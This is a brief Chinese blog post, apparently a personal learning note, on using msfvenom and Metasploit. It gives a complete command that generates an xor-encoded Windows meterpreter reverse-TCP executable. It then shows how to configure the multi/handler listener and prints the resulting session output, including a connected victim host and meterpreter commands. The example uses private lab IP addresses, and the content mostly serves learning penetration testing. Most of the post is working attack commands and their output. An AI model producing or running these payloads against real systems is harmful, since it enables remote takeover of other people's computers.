msfvenom 简单利用记录

msfvenom常用参数大概就是-p (payload) ,-e(encoder),-i(encoder次数),-o(输出路径),-f(输出文件类型)。

 

简单生成一个反弹tcp的exe文件,使用编码方式是xor:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.120 LPORT=4444 -e xor -i 5 -f exe -o /test.exe

 

打开msfconsole,

use exploit/multi/handler

设置payload,

set payload windows/meterpreter/reverse_tcp

show info和show options显示不同,用options显示需要的参数。

接下来用set LHOST等设置ip,端口,run执行监听。

 

连接成功以后,用sessions -l显示连接,sessions -<id>进入连接

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                           Connection
  --  ----  ----                     -----------                           ----------
  1         meterpreter x64/windows  WIN-76353R2J6TB\lc @ WIN-76353R2J6TB  192.168.0.120:4444 -> 192.168.0.107:49282 (192.168.0.107)

进入以后使用命令和help可以查看帮助,background可以退出挂起

meterpreter > pwd
C:\Users\lc\Downloads
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(handler) > 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值